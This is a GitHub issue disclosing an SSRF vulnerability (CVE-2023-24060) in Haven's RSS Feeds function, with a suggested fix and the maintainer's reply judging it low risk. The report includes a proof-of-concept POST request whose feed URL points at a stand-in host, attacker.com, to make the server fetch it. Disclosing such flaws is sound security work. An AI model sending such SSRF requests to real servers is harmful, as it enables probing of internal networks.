Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Security] Haven v5d15944 Server-Side Request Forgery (SSRF) - CVE-2023-24060 #51

Closed
Sean-McRae opened this issue Jan 23, 2023 · 1 comment

Comments

@Sean-McRae
Copy link

Sean-McRae commented Jan 23, 2023

A Security Advisory has been raised for Haven v5d15944 (CVE-2023-24060):

Description:
Haven v5d15944 allows Server-Side Request Forgery (SSRF) via the Feeds functionality.
Malicious authenticated users with the ability to create or add RSS Feeds to the website can supply an arbitrary host such as the host itself in an attempt to scan the internal network.

Affected URL (Parameter):
http://localhost:3000/feeds (url)

image

Suggested Fix:
Consider performing this action on the client-side. There's no need for the server to fetch the RSS feed, have the user's browser fetch the latest feed when loading the page. This would also remove the need to have a script that will execute every so often to update the RSS feed.

Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24060
https://nvd.nist.gov/vuln/detail/CVE-2023-24060
https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

Payload:

POST /feeds HTTP/1.1
Host: localhost:3000
Content-Length: 203
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Cookie: _blog_session=[]
Connection: close

utf8=%E2%9C%93&authenticity_token=[]&feed%5Burl%5D=https%3A%2F%2Fattacker.com%2Frss&commit=Add+Feed
@mawise
Copy link
Contributor

mawise commented Mar 10, 2023

Thanks for the report. Right now the only user who can modify feeds is the admin for a Haven so this seems pretty low risk. Hosted Havens each run in their own (virtual) network for further isolation. There are future plans I have for Haven where this will be more significant--I'll have to think about how I want to approach resolution.

@mawise mawise closed this as completed Mar 10, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants